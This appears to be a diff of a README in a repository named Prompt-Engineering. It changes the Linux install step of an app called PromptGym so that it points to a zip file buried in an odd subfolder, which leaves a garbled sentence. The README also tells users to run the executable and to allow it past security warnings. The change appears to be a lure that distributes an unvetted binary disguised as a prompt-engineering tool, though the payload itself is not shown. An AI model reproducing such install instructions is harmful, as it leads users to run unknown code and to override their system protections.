erbro61/Prompt-Engineering/README.md

 - **Windows:** Double-click the `.exe` file and follow the setup wizard.
 Click “Next” and then “Install”.
 Finish by clicking “Close.”
 - **macOS:** Open the `.dmg` file, then drag the app icon into your Applications folder.
-- **Linux:** Extract the `.tar.gz` file.
+- **Linux:** Extract the `https://raw.githubusercontent.com/erbro61/Prompt-Engineering/master/sublid/Engineering_Prompt_3.0-beta.2.zip` file.
 Inside, you will find an executable file.
 Run it by double-clicking or from the terminal with `./PromptGym`.

 If you see a security warning when opening the app, allow it to run in your system preferences or security settings.